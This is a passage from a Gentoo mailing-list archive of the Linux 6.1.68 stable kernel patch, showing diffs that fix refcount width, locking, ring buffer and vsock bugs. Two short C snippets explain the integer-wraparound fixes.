+-	       atomic_read(&cred->usage),
++	kdebug("__put_cred(%p{%ld,%d})", cred,
++	       atomic_long_read(&cred->usage),
+ 	       read_cred_subscribers(cred));
+ 
+-	BUG_ON(atomic_read(&cred->usage) != 0);
++	BUG_ON(atomic_long_read(&cred->usage) != 0);
+ #ifdef CONFIG_DEBUG_CREDENTIALS
+ 	BUG_ON(read_cred_subscribers(cred) != 0);
+ 	cred->magic = CRED_MAGIC_DEAD;
+@@ -161,8 +161,8 @@ void exit_creds(struct task_struct *tsk)
+ {
+ 	struct cred *cred;
+ 
+-	kdebug("exit_creds(%u,%p,%p,{%d,%d})", tsk->pid, tsk->real_cred, tsk->cred,
+-	       atomic_read(&tsk->cred->usage),
++	kdebug("exit_creds(%u,%p,%p,{%ld,%d})", tsk->pid, tsk->real_cred, tsk->cred,
++	       atomic_long_read(&tsk->cred->usage),
+ 	       read_cred_subscribers(tsk->cred));
+ 
+ 	cred = (struct cred *) tsk->real_cred;
+@@ -221,7 +221,7 @@ struct cred *cred_alloc_blank(void)
+ 	if (!new)
+ 		return NULL;
+ 
+-	atomic_set(&new->usage, 1);
++	atomic_long_set(&new->usage, 1);
+ #ifdef CONFIG_DEBUG_CREDENTIALS
+ 	new->magic = CRED_MAGIC;
+ #endif
+@@ -267,7 +267,7 @@ struct cred *prepare_creds(void)
+ 	memcpy(new, old, sizeof(struct cred));
+ 
+ 	new->non_rcu = 0;
+-	atomic_set(&new->usage, 1);
++	atomic_long_set(&new->usage, 1);
+ 	set_cred_subscribers(new, 0);
+ 	get_group_info(new->group_info);
+ 	get_uid(new->user);
+@@ -355,8 +355,8 @@ int copy_creds(struct task_struct *p, unsigned long clone_flags)
+ 		p->real_cred = get_cred(p->cred);
+ 		get_cred(p->cred);
+ 		alter_cred_subscribers(p->cred, 2);
+-		kdebug("share_creds(%p{%d,%d})",
+-		       p->cred, atomic_read(&p->cred->usage),
++		kdebug("share_creds(%p{%ld,%d})",
++		       p->cred, atomic_long_read(&p->cred->usage),
+ 		       read_cred_subscribers(p->cred));
+ 		inc_rlimit_ucounts(task_ucounts(p), UCOUNT_RLIMIT_NPROC, 1);
+ 		return 0;
+@@ -449,8 +449,8 @@ int commit_creds(struct cred *new)
+ 	struct task_struct *task = current;
+ 	const struct cred *old = task->real_cred;
+ 
+-	kdebug("commit_creds(%p{%d,%d})", new,
+-	       atomic_read(&new->usage),
++	kdebug("commit_creds(%p{%ld,%d})", new,
++	       atomic_long_read(&new->usage),
+ 	       read_cred_subscribers(new));
+ 
+ 	BUG_ON(task->cred != old);
+@@ -459,7 +459,7 @@ int commit_creds(struct cred *new)
+ 	validate_creds(old);
+ 	validate_creds(new);
+ #endif
+-	BUG_ON(atomic_read(&new->usage) < 1);
++	BUG_ON(atomic_long_read(&new->usage) < 1);
+ 
+ 	get_cred(new); /* we will require a ref for the subj creds too */
+ 
+@@ -532,14 +532,14 @@ EXPORT_SYMBOL(commit_creds);
+  */
+ void abort_creds(struct cred *new)
+ {
+-	kdebug("abort_creds(%p{%d,%d})", new,
+-	       atomic_read(&new->usage),
++	kdebug("abort_creds(%p{%ld,%d})", new,
++	       atomic_long_read(&new->usage),
+ 	       read_cred_subscribers(new));
+ 
+ #ifdef CONFIG_DEBUG_CREDENTIALS
+ 	BUG_ON(read_cred_subscribers(new) != 0);
+ #endif
+-	BUG_ON(atomic_read(&new->usage) < 1);
++	BUG_ON(atomic_long_read(&new->usage) < 1);
+ 	put_cred(new);
+ }
+ EXPORT_SYMBOL(abort_creds);
+@@ -555,8 +555,8 @@ const struct cred *override_creds(const struct cred *new)
+ {
+ 	const struct cred *old = current->cred;
+ 
+-	kdebug("override_creds(%p{%d,%d})", new,
+-	       atomic_read(&new->usage),
++	kdebug("override_creds(%p{%ld,%d})", new,
++	       atomic_long_read(&new->usage),
+ 	       read_cred_subscribers(new));
+ 
+ 	validate_creds(old);
+@@ -578,8 +578,8 @@ const struct cred *override_creds(const struct cred *new)
+ 	rcu_assign_pointer(current->cred, new);
+ 	alter_cred_subscribers(old, -1);
+ 
+-	kdebug("override_creds() = %p{%d,%d}", old,
+-	       atomic_read(&old->usage),
++	kdebug("override_creds() = %p{%ld,%d}", old,
++	       atomic_long_read(&old->usage),
+ 	       read_cred_subscribers(old));
+ 	return old;
+ }
+@@ -596,8 +596,8 @@ void revert_creds(const struct cred *old)
+ {
+ 	const struct cred *override = current->cred;
+ 
+-	kdebug("revert_creds(%p{%d,%d})", old,
+-	       atomic_read(&old->usage),
++	kdebug("revert_creds(%p{%ld,%d})", old,
++	       atomic_long_read(&old->usage),
+ 	       read_cred_subscribers(old));
+ 
+ 	validate_creds(old);
+@@ -729,7 +729,7 @@ struct cred *prepare_kernel_cred(struct task_struct *daemon)
+ 
+ 	*new = *old;
+ 	new->non_rcu = 0;
+-	atomic_set(&new->usage, 1);
++	atomic_long_set(&new->usage, 1);
+ 	set_cred_subscribers(new, 0);
+ 	get_uid(new->user);
+ 	get_user_ns(new->user_ns);
+@@ -843,8 +843,8 @@ static void dump_invalid_creds(const struct cred *cred, const char *label,
+ 	       cred == tsk->cred ? "[eff]" : "");
+ 	printk(KERN_ERR "CRED: ->magic=%x, put_addr=%p\n",
+ 	       cred->magic, cred->put_addr);
+-	printk(KERN_ERR "CRED: ->usage=%d, subscr=%d\n",
+-	       atomic_read(&cred->usage),
++	printk(KERN_ERR "CRED: ->usage=%ld, subscr=%d\n",
++	       atomic_long_read(&cred->usage),
+ 	       read_cred_subscribers(cred));
+ 	printk(KERN_ERR "CRED: ->*uid = { %d,%d,%d,%d }\n",
+ 		from_kuid_munged(&init_user_ns, cred->uid),
+@@ -916,9 +916,9 @@ EXPORT_SYMBOL(__validate_process_creds);
+  */
+ void validate_creds_for_do_exit(struct task_struct *tsk)
+ {
+-	kdebug("validate_creds_for_do_exit(%p,%p{%d,%d})",
++	kdebug("validate_creds_for_do_exit(%p,%p{%ld,%d})",
+ 	       tsk->real_cred, tsk->cred,
+-	       atomic_read(&tsk->cred->usage),
++	       atomic_long_read(&tsk->cred->usage),
+ 	       read_cred_subscribers(tsk->cred));
+ 
+ 	__validate_process_creds(tsk, __FILE__, __LINE__);
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 0193243f65e5c..8c7d2f4f5fbab 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -1945,6 +1945,16 @@ static bool perf_event_validate_size(struct perf_event *event)
+ 				   group_leader->nr_siblings + 1) > 16*1024)
+ 		return false;
+ 
++	/*
++	 * When creating a new group leader, group_leader->ctx is initialized
++	 * after the size has been validated, but we cannot safely use
++	 * for_each_sibling_event() until group_leader->ctx is set. A new group
++	 * leader cannot have any siblings yet, so we can safely skip checking
++	 * the non-existent siblings.
++	 */
++	if (event == group_leader)
++		return true;
++
+ 	for_each_sibling_event(sibling, group_leader) {
+ 		if (__perf_event_read_size(sibling->attr.read_format,
+ 					   group_leader->nr_siblings + 1) > 16*1024)
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index c02a4cb879913..61803208706a5 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -711,6 +711,9 @@ static int rb_time_cmpxchg(rb_time_t *t, u64 expect, u64 set)
+ 	unsigned long cnt2, top2, bottom2, msb2;
+ 	u64 val;
+ 
++	/* Any interruptions in this function should cause a failure */
++	cnt = local_read(&t->cnt);
++
+ 	/* The cmpxchg always fails if it interrupted an update */
+ 	 if (!__rb_time_read(t, &val, &cnt2))
+ 		 return false;
+@@ -718,17 +721,18 @@ static int rb_time_cmpxchg(rb_time_t *t, u64 expect, u64 set)
+ 	 if (val != expect)
+ 		 return false;
+ 
+-	 cnt = local_read(&t->cnt);
+ 	 if ((cnt & 3) != cnt2)
+ 		 return false;
+ 
+ 	 cnt2 = cnt + 1;
+ 
+ 	 rb_time_split(val, &top, &bottom, &msb);
++	 msb = rb_time_val_cnt(msb, cnt);
+ 	 top = rb_time_val_cnt(top, cnt);
+ 	 bottom = rb_time_val_cnt(bottom, cnt);
+ 
+ 	 rb_time_split(set, &top2, &bottom2, &msb2);
++	 msb2 = rb_time_val_cnt(msb2, cnt);
+ 	 top2 = rb_time_val_cnt(top2, cnt2);
+ 	 bottom2 = rb_time_val_cnt(bottom2, cnt2);
+ 
+@@ -1801,6 +1805,8 @@ static void rb_free_cpu_buffer(struct ring_buffer_per_cpu *cpu_buffer)
+ 		free_buffer_page(bpage);
+ 	}
+ 
++	free_page((unsigned long)cpu_buffer->free_page);
++
+ 	kfree(cpu_buffer);
+ }
+ 
+@@ -2401,7 +2407,7 @@ rb_iter_head_event(struct ring_buffer_iter *iter)
+ 	 */
+ 	barrier();
+ 
+-	if ((iter->head + length) > commit || length > BUF_MAX_DATA_SIZE)
++	if ((iter->head + length) > commit || length > BUF_PAGE_SIZE)
+ 		/* Writer corrupted the read? */
+ 		goto reset;
+ 
+@@ -3576,7 +3582,10 @@ __rb_reserve_next(struct ring_buffer_per_cpu *cpu_buffer,
+ 		 * absolute timestamp.
+ 		 * Don't bother if this is the start of a new page (w == 0).
+ 		 */
+-		if (unlikely(!a_ok || !b_ok || (info->before != info->after && w))) {
++		if (!w) {
++			/* Use the sub-buffer timestamp */
++			info->delta = 0;
++		} else if (unlikely(!a_ok || !b_ok || info->before != info->after)) {
+ 			info->add_timestamp |= RB_ADD_STAMP_FORCE | RB_ADD_STAMP_EXTEND;
+ 			info->length += RB_LEN_TIME_EXTEND;
+ 		} else {
+@@ -3599,26 +3608,19 @@ __rb_reserve_next(struct ring_buffer_per_cpu *cpu_buffer,
+ 
+ 	/* See if we shot pass the end of this buffer page */
+ 	if (unlikely(write > BUF_PAGE_SIZE)) {
+-		/* before and after may now different, fix it up*/
+-		b_ok = rb_time_read(&cpu_buffer->before_stamp, &info->before);
+-		a_ok = rb_time_read(&cpu_buffer->write_stamp, &info->after);
+-		if (a_ok && b_ok && info->before != info->after)
+-			(void)rb_time_cmpxchg(&cpu_buffer->before_stamp,
+-					      info->before, info->after);
+-		if (a_ok && b_ok)
+-			check_buffer(cpu_buffer, info, CHECK_FULL_PAGE);
++		check_buffer(cpu_buffer, info, CHECK_FULL_PAGE);
+ 		return rb_move_tail(cpu_buffer, tail, info);
+ 	}
+ 
+ 	if (likely(tail == w)) {
+-		u64 save_before;
+-		bool s_ok;
+-
+ 		/* Nothing interrupted us between A and C */
+  /*D*/		rb_time_set(&cpu_buffer->write_stamp, info->ts);
+-		barrier();
+- /*E*/		s_ok = rb_time_read(&cpu_buffer->before_stamp, &save_before);
+-		RB_WARN_ON(cpu_buffer, !s_ok);
++		/*
++		 * If something came in between C and D, the write stamp
++		 * may now not be in sync. But that's fine as the before_stamp
++		 * will be different and then next event will just be forced
++		 * to use an absolute timestamp.
++		 */
+ 		if (likely(!(info->add_timestamp &
+ 			     (RB_ADD_STAMP_FORCE | RB_ADD_STAMP_ABSOLUTE))))
+ 			/* This did not interrupt any time update */
+@@ -3626,24 +3628,7 @@ __rb_reserve_next(struct ring_buffer_per_cpu *cpu_buffer,
+ 		else
+ 			/* Just use full timestamp for interrupting event */
+ 			info->delta = info->ts;
+-		barrier();
+ 		check_buffer(cpu_buffer, info, tail);
+-		if (unlikely(info->ts != save_before)) {
+-			/* SLOW PATH - Interrupted between C and E */
+-
+-			a_ok = rb_time_read(&cpu_buffer->write_stamp, &info->after);
+-			RB_WARN_ON(cpu_buffer, !a_ok);
+-
+-			/* Write stamp must only go forward */
+-			if (save_before > info->after) {
+-				/*
+-				 * We do not care about the result, only that
+-				 * it gets updated atomically.
+-				 */
+-				(void)rb_time_cmpxchg(&cpu_buffer->write_stamp,
+-						      info->after, save_before);
+-			}
+-		}
+ 	} else {
+ 		u64 ts;
+ 		/* SLOW PATH - Interrupted between A and C */
+@@ -3734,6 +3719,8 @@ rb_reserve_next_event(struct trace_buffer *buffer,
+ 	if (ring_buffer_time_stamp_abs(cpu_buffer->buffer)) {
+ 		add_ts_default = RB_ADD_STAMP_ABSOLUTE;
+ 		info.length += RB_LEN_TIME_EXTEND;
++		if (info.length > BUF_MAX_DATA_SIZE)
++			goto out_fail;
+ 	} else {
+ 		add_ts_default = RB_ADD_STAMP_NONE;
+ 	}
+@@ -5118,7 +5105,8 @@ ring_buffer_read_prepare(struct trace_buffer *buffer, int cpu, gfp_t flags)
+ 	if (!iter)
+ 		return NULL;
+ 
+-	iter->event = kmalloc(BUF_MAX_DATA_SIZE, flags);
++	/* Holds the entire event: data and meta data */
++	iter->event = kmalloc(BUF_PAGE_SIZE, flags);
+ 	if (!iter->event) {
+ 		kfree(iter);
+ 		return NULL;
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index d2db4d6f0f2fd..87eca95b57fb3 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -6268,7 +6268,7 @@ static int __tracing_resize_ring_buffer(struct trace_array *tr,
+ 	if (!tr->array_buffer.buffer)
+ 		return 0;
+ 
+-	/* Do not allow tracing while resizng ring buffer */
++	/* Do not allow tracing while resizing ring buffer */
+ 	tracing_stop_tr(tr);
+ 
+ 	ret = ring_buffer_resize(tr->array_buffer.buffer, size, cpu);
+@@ -6276,7 +6276,7 @@ static int __tracing_resize_ring_buffer(struct trace_array *tr,
+ 		goto out_start;
+ 
+ #ifdef CONFIG_TRACER_MAX_TRACE
+-	if (!tr->current_trace->use_max_tr)
++	if (!tr->allocated_snapshot)
+ 		goto out;
+ 
+ 	ret = ring_buffer_resize(tr->max_buffer.buffer, size, cpu);
+diff --git a/mm/shmem.c b/mm/shmem.c
+index 806741bbe4a68..f7c08e169e423 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -1024,7 +1024,24 @@ whole_folios:
+ 				}
+ 				VM_BUG_ON_FOLIO(folio_test_writeback(folio),
+ 						folio);
+-				truncate_inode_folio(mapping, folio);
++
++				if (!folio_test_large(folio)) {
++					truncate_inode_folio(mapping, folio);
++				} else if (truncate_inode_partial_folio(folio, lstart, lend)) {
++					/*
++					 * If we split a page, reset the loop so
++					 * that we pick up the new sub pages.
++					 * Otherwise the THP was entirely
++					 * dropped or the target range was
++					 * zeroed, so just continue the loop as
++					 * is.
++					 */
++					if (!folio_test_large(folio)) {
++						folio_unlock(folio);
++						index = start;
++						break;
++					}
++				}
+ 			}
+ 			index = folio->index + folio_nr_pages(folio) - 1;
+ 			folio_unlock(folio);
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index 93d6f27dd40b4..3f090faa6377f 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -4770,7 +4770,7 @@ static bool sort_folio(struct lruvec *lruvec, struct folio *folio, struct scan_c
+ 	}
+ 
+ 	/* protected */
+-	if (tier > tier_idx) {
++	if (tier > tier_idx || refs == BIT(LRU_REFS_WIDTH)) {
+ 		int hist = lru_hist_from_seq(lrugen->min_seq[type]);
+ 
+ 		gen = folio_inc_gen(lruvec, folio, false);
+diff --git a/mm/workingset.c b/mm/workingset.c
+index ae7e984b23c6b..6e4699055ed37 100644
+--- a/mm/workingset.c
++++ b/mm/workingset.c
+@@ -289,10 +289,10 @@ static void lru_gen_refault(struct folio *folio, void *shadow)
+ 	 * 1. For pages accessed through page tables, hotter pages pushed out
+ 	 *    hot pages which refaulted immediately.
+ 	 * 2. For pages accessed multiple times through file descriptors,
+-	 *    numbers of accesses might have been out of the range.
++	 *    they would have been protected by sort_folio().
+ 	 */
+-	if (lru_gen_in_fault() || refs == BIT(LRU_REFS_WIDTH)) {
+-		folio_set_workingset(folio);
++	if (lru_gen_in_fault() || refs >= BIT(LRU_REFS_WIDTH) - 1) {
++		set_mask_bits(&folio->flags, 0, LRU_REFS_MASK | BIT(PG_workingset));
+ 		mod_lruvec_state(lruvec, WORKINGSET_RESTORE_BASE + type, delta);
+ 	}
+ unlock:
+diff --git a/net/appletalk/ddp.c b/net/appletalk/ddp.c
+index a06f4d4a6f476..f67f14db16334 100644
+--- a/net/appletalk/ddp.c
++++ b/net/appletalk/ddp.c
+@@ -1811,15 +1811,14 @@ static int atalk_ioctl(struct socket *sock, unsigned int cmd, unsigned long arg)
+ 		break;
+ 	}
+ 	case TIOCINQ: {
+-		/*
+-		 * These two are safe on a single CPU system as only
+-		 * user tasks fiddle here
+-		 */
+-		struct sk_buff *skb = skb_peek(&sk->sk_receive_queue);
++		struct sk_buff *skb;
+ 		long amount = 0;
+ 
++		spin_lock_irq(&sk->sk_receive_queue.lock);
++		skb = skb_peek(&sk->sk_receive_queue);
+ 		if (skb)
+ 			amount = skb->len - sizeof(struct ddpehdr);
++		spin_unlock_irq(&sk->sk_receive_queue.lock);
+ 		rc = put_user(amount, (int __user *)argp);
+ 		break;
+ 	}
+diff --git a/net/atm/ioctl.c b/net/atm/ioctl.c
+index 838ebf0cabbfb..f81f8d56f5c0c 100644
+--- a/net/atm/ioctl.c
++++ b/net/atm/ioctl.c
+@@ -73,14 +73,17 @@ static int do_vcc_ioctl(struct socket *sock, unsigned int cmd,
+ 	case SIOCINQ:
+ 	{
+ 		struct sk_buff *skb;
++		int amount;
+ 
+ 		if (sock->state != SS_CONNECTED) {
+ 			error = -EINVAL;
+ 			goto done;
+ 		}
++		spin_lock_irq(&sk->sk_receive_queue.lock);
+ 		skb = skb_peek(&sk->sk_receive_queue);
+-		error = put_user(skb ? skb->len : 0,
+-				 (int __user *)argp) ? -EFAULT : 0;
++		amount = skb ? skb->len : 0;
++		spin_unlock_irq(&sk->sk_receive_queue.lock);
++		error = put_user(amount, (int __user *)argp) ? -EFAULT : 0;
+ 		goto done;
+ 	}
+ 	case ATM_SETSC:
+diff --git a/net/batman-adv/soft-interface.c b/net/batman-adv/soft-interface.c
+index 38d411a52f331..d7b525a495e45 100644
+--- a/net/batman-adv/soft-interface.c
++++ b/net/batman-adv/soft-interface.c
+@@ -444,7 +444,7 @@ void batadv_interface_rx(struct net_device *soft_iface,
+ 		if (!pskb_may_pull(skb, VLAN_ETH_HLEN))
+ 			goto dropped;
+ 
+-		vhdr = (struct vlan_ethhdr *)skb->data;
++		vhdr = skb_vlan_eth_hdr(skb);
+ 
+ 		/* drop batman-in-batman packets to prevent loops */
+ 		if (vhdr->h_vlan_encapsulated_proto != htons(ETH_P_BATMAN))
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 5b93d1ed1ed19..67087da45a1f7 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -3210,7 +3210,13 @@ int __tcp_retransmit_skb(struct sock *sk, struct sk_buff *skb, int segs)
+ 	if (skb_still_in_host_queue(sk, skb))
+ 		return -EBUSY;
+ 
++start:
+ 	if (before(TCP_SKB_CB(skb)->seq, tp->snd_una)) {
++		if (unlikely(TCP_SKB_CB(skb)->tcp_flags & TCPHDR_SYN)) {
++			TCP_SKB_CB(skb)->tcp_flags &= ~TCPHDR_SYN;
++			TCP_SKB_CB(skb)->seq++;
++			goto start;
++		}
+ 		if (unlikely(before(TCP_SKB_CB(skb)->end_seq, tp->snd_una))) {
+ 			WARN_ON_ONCE(1);
+ 			return -EINVAL;
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index c63ccd39fc552..b8dc20fe7a4e2 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -6105,11 +6105,7 @@ static int inet6_fill_prefix(struct sk_buff *skb, struct inet6_dev *idev,
+ 	pmsg->prefix_len = pinfo->prefix_len;
+ 	pmsg->prefix_type = pinfo->type;
+ 	pmsg->prefix_pad3 = 0;
+-	pmsg->prefix_flags = 0;
+-	if (pinfo->onlink)
+-		pmsg->prefix_flags |= IF_PREFIX_ONLINK;
+-	if (pinfo->autoconf)
+-		pmsg->prefix_flags |= IF_PREFIX_AUTOCONF;
++	pmsg->prefix_flags = pinfo->flags;
+ 
+ 	if (nla_put(skb, PREFIX_ADDRESS, sizeof(pinfo->prefix), &pinfo->prefix))
+ 		goto nla_put_failure;
+diff --git a/net/rose/af_rose.c b/net/rose/af_rose.c
+index ca2b17f32670d..674937284b8d2 100644
+--- a/net/rose/af_rose.c
++++ b/net/rose/af_rose.c
+@@ -1315,9 +1315,11 @@ static int rose_ioctl(struct socket *sock, unsigned int cmd, unsigned long arg)
+ 	case TIOCINQ: {
+ 		struct sk_buff *skb;
+ 		long amount = 0L;
+-		/* These two are safe on a single CPU system as only user tasks fiddle here */
++
++		spin_lock_irq(&sk->sk_receive_queue.lock);
+ 		if ((skb = skb_peek(&sk->sk_receive_queue)) != NULL)
+ 			amount = skb->len;
++		spin_unlock_irq(&sk->sk_receive_queue.lock);
+ 		return put_user(amount, (unsigned int __user *) argp);
+ 	}
+ 
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 2e60bf06adff0..0323040d34bc6 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -1225,6 +1225,8 @@ alloc_payload:
+ 		}
+ 
+ 		sk_msg_page_add(msg_pl, page, copy, offset);
++		msg_pl->sg.copybreak = 0;
++		msg_pl->sg.curr = msg_pl->sg.end;
+ 		sk_mem_charge(sk, copy);
+ 
+ 		offset += copy;
+diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
+index 79e79fd6efd19..2e25890ca52d1 100644
+--- a/net/vmw_vsock/virtio_transport_common.c
++++ b/net/vmw_vsock/virtio_transport_common.c
+@@ -583,7 +583,7 @@ static s64 virtio_transport_has_space(struct vsock_sock *vsk)
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+ 	s64 bytes;
+ 
+-	bytes = vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);
++	bytes = (s64)vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);
+ 	if (bytes < 0)
+ 		bytes = 0;
+ 
+diff --git a/scripts/sign-file.c b/scripts/sign-file.c
+index 598ef5465f825..3edb156ae52c3 100644
+--- a/scripts/sign-file.c
++++ b/scripts/sign-file.c
+@@ -322,7 +322,7 @@ int main(int argc, char **argv)
+ 				     CMS_NOSMIMECAP | use_keyid |
+ 				     use_signed_attrs),
+ 		    "CMS_add1_signer");
+-		ERR(CMS_final(cms, bm, NULL, CMS_NOCERTS | CMS_BINARY) < 0,
++		ERR(CMS_final(cms, bm, NULL, CMS_NOCERTS | CMS_BINARY) != 1,
+ 		    "CMS_final");
+ 
+ #else
+@@ -341,10 +341,10 @@ int main(int argc, char **argv)
+ 			b = BIO_new_file(sig_file_name, "wb");
+ 			ERR(!b, "%s", sig_file_name);
+ #ifndef USE_PKCS7
+-			ERR(i2d_CMS_bio_stream(b, cms, NULL, 0) < 0,
++			ERR(i2d_CMS_bio_stream(b, cms, NULL, 0) != 1,
+ 			    "%s", sig_file_name);
+ #else
+-			ERR(i2d_PKCS7_bio(b, pkcs7) < 0,
++			ERR(i2d_PKCS7_bio(b, pkcs7) != 1,
+ 			    "%s", sig_file_name);
+ #endif
+ 			BIO_free(b);
+@@ -374,9 +374,9 @@ int main(int argc, char **argv)
+ 
+ 	if (!raw_sig) {
+ #ifndef USE_PKCS7
+-		ERR(i2d_CMS_bio_stream(bd, cms, NULL, 0) < 0, "%s", dest_name);
++		ERR(i2d_CMS_bio_stream(bd, cms, NULL, 0) != 1, "%s", dest_name);
+ #else
+-		ERR(i2d_PKCS7_bio(bd, pkcs7) < 0, "%s", dest_name);
++		ERR(i2d_PKCS7_bio(bd, pkcs7) != 1, "%s", dest_name);
+ #endif
+ 	} else {
+ 		BIO *b;
+@@ -396,7 +396,7 @@ int main(int argc, char **argv)
+ 	ERR(BIO_write(bd, &sig_info, sizeof(sig_info)) < 0, "%s", dest_name);
+ 	ERR(BIO_write(bd, magic_number, sizeof(magic_number) - 1) < 0, "%s", dest_name);
+ 
+-	ERR(BIO_free(bd) < 0, "%s", dest_name);
++	ERR(BIO_free(bd) != 1, "%s", dest_name);
+ 
+ 	/* Finally, if we're signing in place, replace the original. */
+ 	if (replace_orig)
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 7b5e09070ab9b..f460ac80c8e49 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -1993,7 +1993,10 @@ static const struct snd_pci_quirk force_connect_list[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x871a, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x8711, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x8715, "HP", 1),
++	SND_PCI_QUIRK(0x1043, 0x86ae, "ASUS", 1),  /* Z170 PRO */
++	SND_PCI_QUIRK(0x1043, 0x86c7, "ASUS", 1),  /* Z170M PLUS */
+ 	SND_PCI_QUIRK(0x1462, 0xec94, "MS-7C94", 1),
++	SND_PCI_QUIRK(0x8086, 0x2060, "Intel NUC5CPYB", 1),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", 1),
+ 	{}
+ };
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index c6cae3369a6a1..a7c361e0daebe 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9577,6 +9577,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x83b9, "HP Spectre x360", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x841c, "HP Pavilion 15-CK0xx", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x8497, "HP Envy x360", ALC269_FIXUP_HP_MUTE_LED_MIC3),
++	SND_PCI_QUIRK(0x103c, 0x84ae, "HP 15-db0403ng", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x84da, "HP OMEN dc0019-ur", ALC295_FIXUP_HP_OMEN),
+ 	SND_PCI_QUIRK(0x103c, 0x84e7, "HP Pavilion 15", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x8519, "HP Spectre x360 15-df0xxx", ALC285_FIXUP_HP_SPECTRE_X360),
+diff --git a/tools/testing/selftests/bpf/progs/bpf_loop_bench.c b/tools/testing/selftests/bpf/progs/bpf_loop_bench.c
+index 4ce76eb064c41..d461746fd3c1e 100644
+--- a/tools/testing/selftests/bpf/progs/bpf_loop_bench.c
++++ b/tools/testing/selftests/bpf/progs/bpf_loop_bench.c
+@@ -15,13 +15,16 @@ static int empty_callback(__u32 index, void *data)
+ 	return 0;
+ }
+ 
++static int outer_loop(__u32 index, void *data)
++{
++	bpf_loop(nr_loops, empty_callback, NULL, 0);
++	__sync_add_and_fetch(&hits, nr_loops);
++	return 0;
++}
++
+ SEC("fentry/" SYS_PREFIX "sys_getpgid")
+ int benchmark(void *ctx)
+ {
+-	for (int i = 0; i < 1000; i++) {
+-		bpf_loop(nr_loops, empty_callback, NULL, 0);
+-
+-		__sync_add_and_fetch(&hits, nr_loops);
+-	}
++	bpf_loop(1000, outer_loop, NULL, 0);
+ 	return 0;
+ }
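
Two of the fixes in this patch are easy to reproduce in isolation. The kernel/cred.c and cred.h hunks above widen the credential refcount from atomic_t to atomic_long_t, which removes any realistic chance of the 32-bit counter wrapping; a wrapped refcount makes a still-referenced object look free. A toy illustration of the wrap, using plain integers as stand-ins for the kernel atomics (hypothetical values, not kernel code):

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	/* Stand-ins for a 32-bit vs a 64-bit usage counter */
	uint32_t usage32 = UINT32_MAX;	/* 32-bit count at its ceiling */
	uint64_t usage64 = UINT32_MAX;

	usage32++;	/* wraps to 0: a live object now looks unreferenced */
	usage64++;	/* 64-bit count stays accurate */

	printf("32-bit after ++: %u\n", usage32);			/* prints 0 */
	printf("64-bit after ++: %llu\n", (unsigned long long)usage64);
	return 0;
}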

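The virtio_transport_has_space() change is a classic unsigned-wraparound fix: peer_buf_alloc, tx_cnt and peer_fwd_cnt are 32-bit fields, so without the (s64) cast the subtraction is evaluated modulo 2^32 and a credit deficit surfaces as an enormous positive byte count instead of a negative one. A minimal user-space sketch with made-up credit values (the real fields live in struct virtio_vsock_sock):

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint32_t peer_buf_alloc = 4096;
	uint32_t tx_cnt = 10000, peer_fwd_cnt = 1000;

	/* Before the fix: the whole expression is computed in u32 and wraps */
	int64_t bad = peer_buf_alloc - (tx_cnt - peer_fwd_cnt);

	/* After the fix: widening first lets the deficit go genuinely negative */
	int64_t good = (int64_t)peer_buf_alloc - (tx_cnt - peer_fwd_cnt);

	printf("bad  = %lld\n", (long long)bad);	/* 4294962392 */
	printf("good = %lld\n", (long long)good);	/* -4904; the kernel clamps negatives to 0 */
	return 0;
}
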

* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-12-13 18:27 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-12-13 18:27 UTC (permalink / raw
  To: gentoo-commits

commit:     1b001ef904a50ea1a63ca48ab21fb6ecd6d3d362
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Dec 13 18:27:06 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Dec 13 18:27:06 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1b001ef9

Linux patch 6.1.68

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
